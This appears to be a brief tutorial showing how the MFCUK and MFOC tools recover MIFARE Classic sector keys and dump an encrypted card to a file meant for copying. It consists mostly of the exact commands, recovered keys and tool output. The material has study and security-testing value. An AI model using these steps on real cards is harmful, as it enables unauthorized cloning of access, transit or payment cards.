MFCUK – MiFare Classic Universal toolKit.
Recovering a key without know any key, and it took few minutes to a couple of ten minutes to recover a key
ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:A -v 2
INFO: block 3 recovered KEY: 8c9c83f6d192
ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:B -v 2
INFO: block 3 recovered KEY: f4a9ef2afc6d
Some time we get recoverable error, but decrypt process is still fine.
RECOVER: 0mfcuk: ERROR: mfcuk_key_recovery_block() (error code=0x03)
MFOC is an open source implementation of “offline nested” attack by Nethemba.
If a card uses at least one block encrypted with a default key, all the other keys can be extracted in minutes. If the card does not use default keys, one key for a sector can be retrieved using the MFCUK library, after which this library can be used.
By use keys for a sectors are retrieved using the MFCUK library:
sudo mfoc -k 8c9c83f6d192 -k f4a9ef2afc6d -P 500 -O cardtocopy.dmp
The custom key 0x8c9c83f6d192 has been added to the default keys
The custom key 0xf4a9ef2afc6d has been added to the default keys
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 2a e9 0e 52
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
The content of encrypted card is dumping into “cardtocopy.dmp”